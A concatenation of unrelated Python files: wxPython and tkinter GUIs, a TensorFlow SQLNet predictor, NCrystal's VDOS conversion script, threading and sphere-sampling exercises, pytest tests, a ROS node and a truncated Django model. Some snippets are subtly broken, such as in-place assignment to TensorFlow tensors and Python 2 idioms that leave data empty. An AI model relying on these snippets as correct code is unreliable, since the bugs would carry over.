self.bt_soc_consultar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_buscar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_consultar.Enable( False )
lay_botao.Add( self.bt_soc_consultar, 0, wx.ALL, 5 )
self.bt_soc_adicionar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_adicionar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
self.bt_soc_adicionar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_adicionar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_adicionar.SetDefault()
self.bt_soc_adicionar.Enable( False )
lay_botao.Add( self.bt_soc_adicionar, 0, wx.ALL, 5 )
self.bt_soc_editar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_editar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_BOTTOM )
self.bt_soc_editar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_editar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_editar.Enable( False )
lay_botao.Add( self.bt_soc_editar, 0, wx.ALL, 5 )
self.bt_soc_excluir = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_lixeira_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
self.bt_soc_excluir.SetBitmapDisabled( wx.Bitmap( u"icons/ac_lixeira_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_excluir.Enable( False )
lay_botao.Add( self.bt_soc_excluir, 0, wx.ALL, 5 )
self.bt_soc_confirmar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_confirmar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
self.bt_soc_confirmar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_confirmar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_confirmar.Enable( False )
lay_botao.Add( self.bt_soc_confirmar, 0, wx.ALL, 5 )
self.bt_soc_cancelar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_cancelar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
self.bt_soc_cancelar.SetBitmapDisabled( wx.Bitmap( u"icons/ac_cancelar_16x16_inat.png", wx.BITMAP_TYPE_ANY ) )
self.bt_soc_cancelar.Enable( False )
lay_botao.Add( self.bt_soc_cancelar, 0, wx.ALL, 5 )
lay_socios.Add( lay_botao, 0, wx.ALIGN_BOTTOM|wx.EXPAND, 5 )
self.pn_socios.SetSizer( lay_socios )
self.pn_socios.Layout()
lay_socios.Fit( self.pn_socios )
self.nb_dados.AddPage( self.pn_socios, u"Quadro Societário", False )
lay_guias.Add( self.nb_dados, 1, wx.EXPAND |wx.ALL, 5 )
lay_corpo.Add( lay_guias, 1, wx.EXPAND, 5 )
self.SetSizer( lay_corpo )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_TOOL, self.ac_buscar, id = self.bt_buscar.GetId() )
self.Bind( wx.EVT_TOOL, self.ac_adicionar, id = self.bt_adicionar.GetId() )
self.Bind( wx.EVT_TOOL, self.ac_editar, id = self.bt_editar.GetId() )
self.Bind( wx.EVT_TOOL, self.ac_confirmar, id = self.bt_confirmar.GetId() )
self.Bind( wx.EVT_TOOL, self.ac_cancelar, id = self.bt_cancelar.GetId() )
self.Bind( wx.EVT_TOOL, self.ac_sair, id = self.bt_sair.GetId() )
self.gd_socios.Bind( wx.EVT_LEFT_DCLICK, self.soc_consultar )
self.bt_soc_consultar.Bind( wx.EVT_BUTTON, self.soc_consultar )
self.bt_soc_adicionar.Bind( wx.EVT_BUTTON, self.soc_adicionar )
self.bt_soc_editar.Bind( wx.EVT_BUTTON, self.soc_editar )
self.bt_soc_excluir.Bind( wx.EVT_BUTTON, self.soc_excluir )
self.bt_soc_confirmar.Bind( wx.EVT_BUTTON, self.soc_confirmar )
self.bt_soc_cancelar.Bind( wx.EVT_BUTTON, self.soc_cancelar )
def __del__( self ):
pass
# Virtual event handlers, overide them in your derived class
def ac_buscar( self, event ):
event.Skip()
def ac_adicionar( self, event ):
event.Skip()
def ac_editar( self, event ):
event.Skip()
def ac_confirmar( self, event ):
event.Skip()
def ac_cancelar( self, event ):
event.Skip()
def ac_sair( self, event ):
event.Skip()
def soc_consultar( self, event ):
event.Skip()
def soc_adicionar( self, event ):
event.Skip()
def soc_editar( self, event ):
event.Skip()
def soc_excluir( self, event ):
event.Skip()
def soc_confirmar( self, event ):
event.Skip()
def soc_cancelar( self, event ):
event.Skip()
|
import json
import numpy as np
from SQLNet.utils import run_lstm, col_name_encode
import tensorflow as tf
import tensorflow.keras.layers as layers
class SelPredictor(tf.keras.Model):
def __init__(self, N_word, N_h, N_depth, max_tok_num, use_ca):
super(SelPredictor, self).__init__()
self.use_ca = use_ca
self.max_tok_num = max_tok_num
self.sel_lstm = tf.keras.Sequential([layers.Bidirectional(layers.LSTM(N_h / 2, dropout=.3,
return_sequences=True)) for _ in range(
N_depth)])
if use_ca:
print("Using column attention on selection predicting")
self.sel_att = layers.Dense(N_h)
else:
print("Not usng column attention on selection predicting")
self.sel_att = layers.Dense(1)
self.sel_col_name_enc = tf.keras.Sequential([
layers.Bidirectional(layers.LSTM(N_h / 2, dropout=.3, return_sequences=True)) for _ in range(N_depth)
])
self.sel_out_K = layers.Dense(N_h)
self.sel_out_col = layers.Dense(N_h)
self.sel_out = tf.keras.Sequential([
layers.Activation("tanh"),
layers.Dense(1)
])
self.softmax = layers.Softmax()
def call(self, inputs, training=None, mask=None):
x_emb_var, x_len, col_inp_var, col_name_len, col_len, col_num = inputs
B = len(x_emb_var)
max_x_len = max(x_len)
e_col, _ = col_name_encode(col_inp_var, col_name_len, col_len, self.sel_col_name_enc)
if self.use_ca:
h_enc, _ = run_lstm(self.sel_lstm, x_emb_var, x_len)
att_val = tf.matmul(e_col, self.sel_att(h_enc), transpose_b=True)
for idx, num in enumerate(x_len):
if num < max_x_len:
att_val[idx, :, num:] = -100
att = tf.reshape(self.softmax(tf.reshape(att_val, (-1, max_x_len))), (B, -1, max_x_len))
K_sel_expand = tf.reduce_sum((tf.expand_dims(h_enc, axis=1) * tf.expand_dims(att, axis=3)), axis=2)
else:
h_enc, _ = run_lstm(self.sel_lstm, x_emb_var, x_len)
att_val = tf.squeeze(self.sel_att(h_enc))
for idx, num in enumerate(x_len):
if num < max_x_len:
att_val[idx, num:] = -100
att = self.softmax(att_val)
K_sel = tf.reduce_sum((h_enc * tf.repeat(tf.expand_dims(att, axis=2), h_enc.shape[-1])), axis=1)
K_sel_expand = tf.expand_dims(K_sel)
sel_score = tf.squeeze(self.sel_out(self.sel_out_K(K_sel_expand) + self.sel_out_col(e_col)))
max_col_num = max(col_num)
for idx, num in enumerate(col_num):
if num < max_col_num:
sel_score[idx, num:] = -100
return sel_score
|
#!/usr/bin/env python3
################################################################################
## ##
## This file is part of NCrystal (see https://mctools.github.io/ncrystal/) ##
## ##
## Copyright 2015-2023 NCrystal developers ##
## ##
## Licensed under the Apache License, Version 2.0 (the "License"); ##
## you may not use this file except in compliance with the License. ##
## You may obtain a copy of the License at ##
## ##
## http://www.apache.org/licenses/LICENSE-2.0 ##
## ##
## Unless required by applicable law or agreed to in writing, software ##
## distributed under the License is distributed on an "AS IS" BASIS, ##
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ##
## See the License for the specific language governing permissions and ##
## limitations under the License. ##
## ##
################################################################################
"""
Script which can read vdos curves from either .ncmat files or simple
two-column ascii text files (the two columns being energy grid and density) and
help users prepare output suitable for inclusion in .ncmat files
"""
################################################################################################
####### Common code for all NCrystal cmdline scripts needing to import NCrystal modules ########
import sys
pyversion = sys.version_info[0:3]
_minpyversion=(3,6,0)
if pyversion < _minpyversion:
raise SystemExit('Unsupported python version %i.%i.%i detected (needs %i.%i.%i or later).'%(pyversion+_minpyversion))
import os as _os
os = _os
import pathlib as _pathlib
pathlib = _pathlib
def maybeThisIsConda():
return ( os.environ.get('CONDA_PREFIX',None) or
os.path.exists(os.path.join(sys.base_prefix, 'conda-meta')) )
def fixSysPathAndImportNCrystal( *, allowfail = False ):
thisdir = pathlib.Path( __file__ ).parent
def extract_cmake_pymodloc():
p = thisdir / 'ncrystal-config'
if not p.exists():
return
with p.open('rt') as fh:
for i,l in enumerate(fh):
if i==30:
break
if l.startswith('#CMAKE_RELPATH_TO_PYMOD:'):
l = l[24:].strip()
return ( thisdir / l ) if l else None
pml = extract_cmake_pymodloc()
hack_syspath = pml and ( pml / 'NCrystal' / '__init__.py' ).exists()
if hack_syspath:
sys.path.insert(0,str(pml.absolute().resolve()))
try:
import NCrystal
except ImportError as e:
if allowfail:
return
msg = 'ERROR: Could not import the NCrystal Python module (reason: "%s")'%e
if maybeThisIsConda():
msg += ' (if using conda it might help to close your terminal and activate your environment again)'
elif not hack_syspath:
msg += ' (perhaps your PYTHONPATH is misconfigured)'
raise SystemExit(msg)
return NCrystal
def ncImportSubModule( mainmodule, submodulename ):
_ = __import__( '%s.%s' % ( mainmodule.__name__, submodulename ) )
return getattr(_,submodulename)
################################################################################################
NC = fixSysPathAndImportNCrystal()
nc_constants = ncImportSubModule( NC, 'constants' )
nc_vdos = ncImportSubModule( NC, 'vdos' )
import numpy as np
import argparse
units_2_fact = nc_vdos.vdos_units_2_eV
units_opts = ', '.join(sorted(units_2_fact.keys()))
def decodeFileName(filename):
if '@@' in filename:
path,select = filename.split('@@',1)
else:
path,select = filename,None
bn=os.path.basename(path)
return dict(path=path,select=select,basename=bn,
title=bn if not select else '%s in %s'%((select if not select.isdigit(
) else f'column #{select}'),bn))
def getVDOSFromFile(fn):
fnd = decodeFileName(fn)
if fnd['basename'].endswith('.ncmat'):
return getVDOSFromNCMAT(fn)
return getVDOSFromTXT(fn)
def getVDOSFromTXT(fn):
fn = decodeFileName(fn)
select=None
if fn['select']:
assert fn['select'].isdigit(),"selection must be column number"
select = int(fn['select'])
#figure out unit:
unit=None
for l in open(fn['path']):
if l.startswith('#') and 'unit' in l:
_=l.split('#',1)[1].split(':',1)
if not len(_)==2:
continue
unit=_[1].strip()
if not unit in units_2_fact.keys():
raise SystemExit(f'Unknown unit "{unit}" specified in {fn["path"]}. Valid choices are: {units_opts}')
break
if not unit:
raise SystemExit(f'Missing energy/frequency unit in {fn["path"]}. Please put initial line with content like "#unit:THz". Valid units are: {units_opts}')
usecols=None
if select is not None:
assert select>0
usecols=(0,select)
_ = np.genfromtxt(fn['path'],dtype=[('egrid','f8'),('density','f8')],usecols=usecols)
egrid=_['egrid'].copy()
density=_['density'].copy()
density /= density.max()
return egrid.copy()*units_2_fact[unit],density.copy()
def getVDOSFromNCMAT(fn):
fnd = decodeFileName(fn)
info = NC.createInfo(fnd['path'])
select = fnd['select']
di_vdos = [di for di in info.dyninfos if isinstance(di,NC.Info.DI_VDOS)]
if not select is None:
l=[]
for di in di_vdos:
dl=di.atomData.displayLabel()
if dl!=select:
print(f"NB: Ignoring (due to selection) VDOS for element {dl} in file {fn}.")
else:
l+=[di]
if not l:
raise SystemExit(f'ERROR: Could not find VDOS in file {fn} for selected element: {select}')
if not len(l)==1:
raise SystemExit(f'ERROR: Multiple VDOS entries in file {fn} for selected element: {select} (which is rather odd!)')
di_vdos = l
if len(di_vdos)>1:
s=' '.join(di.atomData.displayLabel() for di in di_vdos)
raise SystemExit(f"ERROR: Multiple VDOS entries found in file {fn}. Please select one of them (by putting \"@@<element>\" after the file-name): {s}")
elif not di_vdos:
raise SystemExit(f"ERROR: No vdos found in file {fn}")
eg,ds = di_vdos[0].vdosOrigEgrid(),di_vdos[0].vdosOrigDensity()
ds /= ds.max()
if len(eg)==2:
eg = np.linspace(eg[0],eg[1],len(ds))
return eg.copy(),ds.copy()
def parseArgs():
descr="""
Script which can read vdos curves from either .ncmat files or simple two-column
ascii text files (the two columns being energy grid and density) and help users
prepare output suitable for inclusion in .ncmat files. When the input is not an
.ncmat file, the user must specify the energy grid units by adding a line in the file
like for instance "#unit:THz" or "#unit:meV".
In case of NCMAT files with more than one VDOS, just post-fix the filename with
the element to investigate, separated by '@@', e.g. "Al2O3.ncmat@@O". In case of
.txt files with more than 2 columns, select the column representing the VDOS
density in the same manner, e.g. "Al2O3.txt@2" (the first column is always the
energy or frequency).
Thus it is possible to plot the curve, compare against vdos curves from other
.ncmat files, apply low-E truncation (cutoff), regularise binning, and overlay
with an ideal Debye spectrum for a given Debye energy or Debye
temperature. Finally, when running without --plot, it will output the resulting
spectrum into format which is ready for inclusion in .ncmat files.
"""
parser = argparse.ArgumentParser(description=descr)
parser.add_argument("FILE",help="Either .ncmat file with VDOS or a text file with two colums of data: egrid and density.")
parser.add_argument('--plot','-p', action='store_true',help='Plot extracted spectrum')
parser.add_argument("--cutoff",'-c',nargs='+',default=None,type=float,
help="""Emin cutoff points in eV (more than one can be provided for simultaneous
inspection with --plot).""")
parser.add_argument("--unit",'-u',default='meV',type=str,
help=f"Visualisation unit (ignored unless --plot is supplied). Defaults to meV. Possible options are {units_opts}.")
parser.add_argument("--ref",'-r',nargs='+',
action='append',type=str,
help="""Optionally provide list of .ncmat files with
vdos data, to superimpose on plots.""")
parser.add_argument("--forceregular",'-f',type=int,nargs='?',default=0,
help="""Optionally provide this argument to
reparameterise with that amount of linearly spaced
points in [emin,emax+epsilon], where epsilon is chosen
so the grid can be extended to 0 with a whole number of
bins. This format will be directly used by NCrystal
without on-the-fly reparameterisation upon loading.""")
parser.add_argument("--debye",'-d',nargs='?',default='',type=str,
help="""Set to debye temperature (unit K) or egrid point
(units like meV, eV, THz, ...) in order to plot Debye
spectrum with that parameter on top.""")
parser.add_argument('--g1',default=0.0,type=float,
help="""Use with --plot to show Sjolander's G1 function at the indicated temperature
(in kelvin) instead of the DOS directly. This is the Symmetric G1 fct without a
detailed balance factor, and it will be plotted assuming gamma0=1.0.""")
parser.add_argument('--stdout',action='store_true',help="""Produce no output file but
print vdos_egrid and vdos_density lines to stdout (for scripting)""")
dpi_default=200
parser.add_argument('--dpi', default=-1,type=int,
help="""Change plot resolution. Set to 0 to leave matplotlib defaults alone.
(default value is %i, or whatever the NCRYSTAL_DPI env var is set to)."""%dpi_default)
args=parser.parse_args()
if args.forceregular is None:
parser.error('Missing argument (number of points) to --forceregular.')
if args.dpi>3000:
parser.error('Too high DPI value requested.')
if args.dpi==-1:
_=os.environ.get('NCRYSTAL_DPI',None)
if _:
try:
_=int(_)
if _<0:
raise ValueError
except ValueError:
print("ERROR: NCRYSTAL_DPI environment variable must be set to integer >=0")
raise SystemExit
if _>3000:
parser.error('Too high DPI value requested via NCRYSTAL_DPI environment variable.')
args.dpi=_
else:
args.dpi=dpi_default
if args.ref:
args.ref = [item for sublist in args.ref for item in sublist]
if args.ref and not args.plot:
parser.error(f'Option --ref requires --plot')
if args.unit and not args.unit in units_2_fact:
parser.error(f'Unknown unit {args.unit}. Valid options are {units_opts}')
if args.debye and not args.plot:
parser.error(f'Option --debye requires --plot')
if args.stdout and args.plot:
parser.error(f'Option --stdout can not be used with --plot')
if args.cutoff and len(args.cutoff)>1 and not args.plot:
parser.error(f'Option --cutoff can only have one argument when not using --plot')
if args.cutoff and len(args.cutoff)>1 and args.forceregular:
parser.error(f'Option --cutoff can only have one argument when using --forceregular')
if args.debye:
if args.debye.endswith('K'):
args.debye = float(args.debye[0:-1])*nc_constants.constant_boltzmann
else:
#find (longest, so "meV" does not trigger "eV") fitting unit:
l=[ (len(u),u) for u in units_2_fact.keys() if args.debye.endswith(u) ]
l.sort()
if not l:
parser.error("Option --debye requires unit (see --help)")
unit = l[-1][1]
args.debye = units_2_fact[unit] * float(args.debye[0:-len(unit)])
return args
args=parseArgs()
file_decoded = decodeFileName(args.FILE)
args_file_basename=file_decoded['basename']
egrid,density = getVDOSFromFile(args.FILE)
assert len(egrid) == len(density)
print (f"Loaded VDOS with {len(density)} grid points from {args_file_basename}")
numpy_is_sorted = lambda a: np.all(a[:-1] <= a[1:])
numpy_is_strongly_sorted = lambda a: np.all(a[:-1] < a[1:])
if not numpy_is_strongly_sorted(egrid):
for i in range(len(egrid)-1):
if not egrid[i] < egrid[i+1]:
print("Problems detected in egrid points with values ",egrid[i],"and",egrid[i+1])
raise SystemExit('ERROR: egrid values (first column) of input file are not in sorted'
+' (ascending) order, or there are identical elements.')
cutoffs=[]
if args.cutoff:
for c in args.cutoff:
if c >= egrid[-1]:
raise SystemExit(f'ERROR: Cutoff value {c} is higher than highest point in egrid')
i=np.searchsorted(egrid,c)
assert i==0 or egrid[i-1]<c
assert egrid[i]>=c
cutoffs+=[ (i, egrid[i] ) ]
print(f" => Mapping cutoff value of {c} to grid point at {cutoffs[-1][1]}")
def applyCutoff(egrid,density,cutoffs):
if cutoffs:
assert len(cutoffs)==1
c_idx,c_val = cutoffs[0]
return egrid[c_idx:], density[c_idx:]
return egrid,density
if args.forceregular or (not args.plot):
if applyCutoff(egrid,density,cutoffs)[0][0]<=1e-5:
raise SystemExit(f"""
ERROR: The first value in the loaded egrid is {egrid[0]} which is less than 1e-5eV.
This is not allowed when using --forceregular or when not using --plot.
Please use the --cutoff parameter to remove lowest part of input spectrum (perhaps
after investigating the cutoff value with --plot).
""")
def regularise(egrid,density,n):
#first step back from any zeroes at the upper end:
i=1
while i < len(density) and density[-i]==0.0:
i += 1
safepeel = i-2
if safepeel>=1:
print (f"Ignoring {safepeel} last points while regularising since last {safepeel+1} points are 0.")
egrid,density = egrid[0:-(safepeel)],density[0:-(safepeel)]
emin,emax=egrid[0],egrid[-1]
print('old range',emin,emax)
THZ = nc_constants.constant_planck*1e12
print('old range [THZ]',emin/THZ,emax/THZ)
for k in range(1,1000000000):
#k is number of bins below emin, an integral number by definition in a regularised grid.
binwidth = emin/k
nbins=int(np.floor((emax-emin)/binwidth))+1
eps = (emin+nbins*binwidth)-emax
assert eps>=0.0
if nbins+1 >= n:
break
n=nbins+1
binwidth = emin/k
new_emax = emin + (n-1) * binwidth
if abs( (new_emax-binwidth) - emax ) < 1e-3*binwidth:
nbins -= 1
n -= 1
new_emax -= binwidth
print (f" ==> Choosing regular grid with n={n} pts from emin={emin} to emax={new_emax} ({new_emax-emax} beyond old emax)")
assert new_emax >= emax-binwidth*1.001e-3
new_egrid = np.linspace(emin,new_emax,n)
test=new_egrid[0] / ( (new_egrid[-1]-new_egrid[0])/(len(new_egrid)-1) )
assert abs(round(test)-test)<1e-6,f'{test}'
new_density = np.interp(new_egrid,egrid,density, left=0.0, right=0.0)
print(f'last density values in new grid: ',new_density[-5:])
return new_egrid,new_density
if args.forceregular:
regularised_egrid,regularised_density = regularise(*applyCutoff(egrid,density,cutoffs),args.forceregular)
if args.plot:
vis_unit=args.unit
vis_unit_fact = 1.0 / units_2_fact[vis_unit]
def plt_plot(egrid,dos,*aargs,**kwargs):
if args.g1 and args.g1 > 0.0:
#G1 = f(E)/(E*2*gamma0*sinh(E/2kT)) [symmetric G1 that is]
#u = E/2kT
#asymmetric means another factor of exp(-u).
#And exp(-u)/2sinh(u) = exp(-u) / (exp(u)-exp(-u) ) = 1 / ( exp(2u)-1)
#And exp(+u)/2sinh(u) = exp(+u) / (exp(u)-exp(-u) ) = 1 / ( 1-exp(-2u) )
#
#So with gamma0=0 we get:
egrid_eV = egrid.copy() / vis_unit_fact
T = args.g1
gamma0 = 1.0
two_u = egrid_eV / ( nc_constants.constant_boltzmann * T )
#g1asym_neg = dos / ( egrid_eV * -np.expm1(-two_u) )
#g1asym_pos = dos / ( egrid_eV * np.expm1(two_u) )
g1sym = dos / (egrid_eV*np.sinh(0.5*two_u))
plt.plot(egrid,g1sym,*aargs,**kwargs)
else:
plt.plot(egrid,dos,*aargs,**kwargs)
import matplotlib as mpl
mpl.rcParams['figure.dpi']=args.dpi
#ability to quit plot windows with Q:
if 'keymap.quit' in mpl.rcParams and not 'q' in mpl.rcParams['keymap.quit']:
mpl.rcParams['keymap.quit'] = tuple(list(mpl.rcParams['keymap.quit'])+['q','Q'])
import matplotlib.pyplot as plt
plt.xlabel(vis_unit)
plt_plot(egrid*vis_unit_fact,density,'o-',label=file_decoded['title'])
if args.forceregular:
plt_plot(regularised_egrid*vis_unit_fact,regularised_density,'x-',label='regularised')
for c_idx, c_val in cutoffs:
d=density[c_idx]
# f(x)=k*x^2, f(c_val)=d<=> k*c_val^2 = d <=> k = d/c_val^2
x=np.linspace(0.0,c_val,3000)
plt_plot(x*vis_unit_fact,(d/c_val**2)*(x**2),label=f'with cutoff {c_val} eV')
if args.debye:
x=np.linspace(0.0,max(egrid.max(),args.debye),1000)
y = np.where( x<=args.debye, x**2 * ( density.max() / args.debye**2 ), 0.0 )
plt_plot(x*vis_unit_fact,y,
label=f'Debye spectrum (E_Debye={1000*args.debye:.5}meV, T_Debye={args.debye/nc_constants.constant_boltzmann:.5}K)')
for r in (args.ref or []):
eg,ds = getVDOSFromFile(r)
plt_plot(eg*vis_unit_fact,ds,label=decodeFileName(r)['title'])
plt.legend()
plt.title(file_decoded['title'])
plt.grid(ls=':')
plt.show()
sys.exit(0)
if args.forceregular:
egrid, density = regularised_egrid,regularised_density
else:
egrid, density = applyCutoff(egrid,density,cutoffs)
#Check if egrid is linspace:
binwidth = (egrid[-1]-egrid[0])/(len(egrid)-1)
is_linspace=True
if not args.forceregular:
for i in range(len(egrid)-1):
bw=egrid[i+1]-egrid[i]
if abs(binwidth-bw)>0.01*binwidth:
is_linspace=False
break
if is_linspace:
print('NB: Detected linearly spaced input egrid')
#normalise so unity at highest point (gives smaller file sizes):
density /= density.max()
#remove excess trailing zeros
while len(density)>10 and density[-2]==0.0 and density[-1]==0.0:
density = density[0:-1]
egrid = egrid[0:-1]
egrid_cnt =''
if is_linspace:
egrid_cnt += f' vdos_egrid {egrid[0]:.14} {egrid[-1]:.14}'
else:
egrid_cnt += NC.formatVectorForNCMAT('vdos_egrid',egrid)
egrid_cnt += '\n'
egrid_cnt += NC.formatVectorForNCMAT('vdos_density',density)
if args.stdout:
print("<<<GENERATED-CONTENT-BEGIN>>>")
print(egrid_cnt,end='')
else:
outfn=pathlib.Path('converted_output.ncmat')
with outfn.open('wt') as fn:
fn.write(f"""NCMAT v5
#Autogenerated file from {args_file_basename}.
@DENSITY
1.0 g_per_cm3 #FIX{'ME'}!! Please replace with proper value, or remove and optionally provide crystal structure!
@DYNINFO
element <UNKNOWN-PLEASE-EDIT>
fraction 1
type vdos\n""")
fn.write(egrid_cnt)
fn.write('\n')
print(f"Wrote {outfn}")
|
from tkinter import *
from tkinter import filedialog
def saveFile():
file = filedialog.asksaveasfile(initialdir="C:\\Users\\Marcus\\Documents\\python files",
defaultextension='.txt',
filetypes=[
("Text file", ".txt"),
("HTML file", ".html"),
("All files", ".*"),
])
if file is None:
return
filetext = str(text.get(1.0, END))
file.write(filetext)
file.close()
window = Tk()
button = Button(text="Save", command=saveFile)
button.pack()
text = Text(window, font=("Ink Free", 20),
height=8,
width=20,
padx=20,
pady=20,)
text.pack()
window.mainloop() |
def pets(petlist):
try:
with open(petlist) as furry:
meowbarks = furry.read()
except FileNotFoundError:
pass
else:
print(meowbarks)
FreimanPets = ['text_files/cats.txt', 'text_files/dogs1.txt']
for petnames in FreimanPets:
pets(petnames) |
"""
The data points are uniformly distributed on a unit sphere.
To generate these 3-dimensional points, we first generate standard
normally distributed points as vectors lying in 3D space, and then
normalize these vectors (X:= X / ||X||) to make it lie on a sphere
(S^2) which acts as an embedded manifold in 3-D ambient space.
"""
import numpy as np
def sample_spherical(npoints, ndim=3):
vec = np.random.randn(ndim, npoints)
vec /= np.linalg.norm(vec, axis=0)
return vec
"""
phi = np.linspace(0, np.pi, 20)
theta = np.linspace(0, 2 * np.pi, 40)
x = np.outer(np.sin(theta), np.cos(phi))
y = np.outer(np.sin(theta), np.sin(phi))
z = np.outer(np.cos(theta), np.ones_like(phi))
"""
xi, yi, zi = sample_spherical(1000)
data_points = []
map(lambda x,y,z : data_points.append((x,y,z)), xi,yi,zi)
dictionary_datapoints = {k:np.array(v) for k,v in enumerate(data_points)}
chart1, chart2, chart3, chart4, chart5, chart6 = (dict() for _ in range(6))
def CreateCharts(dictionary_datapoints, return_for_evaluating=False):
"""
Creating the 6 charts of the sphere. This code snippet maps 6 hemispheres
homeomorphically to 6 different open regions in R^2 (discs). For e.g. :
the maps (x, y, z) -> (x, y), and its inverse (x, y) ->
(x, y, squareroot(1-x^2-y^2)), are continuous maps from the open
hemisphere (for which z <= 0) to open disk x^2 + y^2 < 1
and from the open disk back to sphere (S^2), respectively.
Here, the homeomorphisms can be thought of instances of the map:
Gi : S^2 -> Ui, where Ui is the 'i'th chart
"""
for i, point in dictionary_datapoints.iteritems():
if point[2] > 0 :
chart1[i] = point[:2]
else:
chart2[i] = point[:2]
if point[1] > 0:
chart3[i] = point[::len(point)-1]
else:
chart4[i] = point[::len(point)-1]
if point[0] > 0:
chart5[i] = point[1:]
else:
chart6[i] = point[1:]
if return_for_evaluating:
return (chart1, chart2, chart3, chart4, chart5, chart6)
CreateCharts(dictionary_datapoints)
dictionary_of_charts = {
'chart1' : chart1,
'chart2' : chart2,
'chart3' : chart3,
'chart4' : chart4,
'chart5' : chart5,
'chart6' : chart6,
}
|
import threading
import datetime
import re
import sys
import time
def thread(input,thread_id):
for i in range(6):
tp = ThreadPool()
self_timer = tp.pool.get(thread_id)
if self_timer==-1:
exit()
print('hello+'+str(input))
time.sleep(1)
if i == 2:
print('stop')
def change(input):
input = 0
# for i in range(3):
# th = threading.Thread(target=thread, args=(i,))
# th.start()
#input = 11
# change(input)
# print(input)
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self.__flag = threading.Event() # 用于暂停线程的标识
self.__flag.set() # 设置为True
self.__running = threading.Event() # 用于停止线程的标识
self.__running.set() # 将running设置为True
def pause(self):
self.__flag.clear() # 设置为False, 让线程阻塞
def resume(self):
self.__flag.set() # 设置为True, 让线程停止阻塞
def stop(self):
self.__flag.set() # 将线程从暂停状态恢复, 如何已经暂停的话
self.__running.clear() # 设置为False
def run(self):
print('hello')
self.stop()
print('hello')
#thread(self, input)
#st = StoppableThread()
# st.start()
def judgeTime(post_date, days_ago):
constraint_date = (datetime.datetime.now() +
datetime.timedelta(days=-days_ago)).strftime("%Y-%m-%d")
m_constraint = re.match(r'(\d{4})-(\d{2})-(\d{2})', constraint_date)
constraint_year = m_constraint.group(1)
constraint_month = m_constraint.group(2)
constraint_day = m_constraint.group(3)
try:
m_date = re.match(r'(\d{4})-(\d{2})-(\d{2})', post_date)
if int(constraint_year) < int(m_date.group(1)):
return True
if int(constraint_year) == int(m_date.group(1)):
if int(constraint_month) < int(m_date.group(2)):
return True
if int(constraint_month) == int(m_date.group(2)):
if int(constraint_day) < int(m_date.group(3)):
return True
if int(constraint_day) == int(m_date.group(3)):
return True
except:
print('process time error')
return False
# print(judgeTime('2019-06-01',10))
class ThreadPool(object):
_pool = {}
@property
def pool(self):
return ThreadPool._pool
@pool.setter
def pool(self, pool):
ThreadPool._pool = pool
# 线程池管理测试
thread_count=0
tp = ThreadPool()
# first
timer = threading.Timer(1, thread, [1,thread_count])
tp.pool[thread_count]=timer
thread_count+=1
# another
timer_2 = threading.Timer(1, thread, [2,thread_count])
tp.pool[thread_count]=timer_2
thread_count+=1
print(tp.pool)
timer.start()
timer_2.start()
# close one thread
time.sleep(4)
tp.pool[0]=-1
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# @Time :2019-11-06 16:55
# @Author: cd
# @FileName:pye_001.py
# @Copyright: @2019-2020
# 使用 time 模块的 sleep() 函数。 |
from horst import Horst
from horst.versioning import bumpversion, UpdateBumpConfig, CreateBumpConfig, RunBumpVersion, _render_int_bump_config
from os import path
import horst.versioning
import pytest
@pytest.fixture(autouse=True)
def set_up_horst():
horst = Horst(__file__)
yield
horst._invalidate()
here = path.dirname(__file__)
def test_bumpversion_nothing_existing():
tasks = list(map(lambda x: x.__class__, bumpversion()))
expected_bump_conf_file = path.join(here, ".bumpversion.conf")
assert tasks == [CreateBumpConfig, UpdateBumpConfig, RunBumpVersion]
def test_bumpversion_does_not_create_new_config_if_one_exists():
horst.versioning._bump_version_config_exists = lambda x: True
tasks = [x.__class__ for x in bumpversion()]
assert tasks == [UpdateBumpConfig, RunBumpVersion]
def test_bumpconfig_init_rendering():
text = _render_int_bump_config(["setup.py"], True, True)
expected_text = """
[bumbversion]
current_version = 0.0.1
commit = True
tag = True
[bumpversion:file:setup.py]
""".lstrip()
assert expected_text == text
|
import rospy
from std_msgs.msg import String
rospy.init_node('PrimNo')
def matricCallBack(msg):
soma = msg.data
print(soma)
def timerCallBack(event):
msg = String()
msg.data = '2017016162'
pub.publish(msg)
pub = rospy.Publisher('/topico1', String, queue_size=1)
rospy.Timer(rospy.Duration(1), timerCallBack)
rospy.Subscriber('/topico2', String, matricCallBack)
rospy.spin() |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.db import models
from django.db.models.signals import pre_save, post_delete
from django.dispatch import receiver
from student.models import Student
from group.models import Group
# Create your models here.
TYPES = (
('C', 'Created'),
('M', 'Modified'),
('D', 'Deleted')
)
class Loginsys(models.Model):
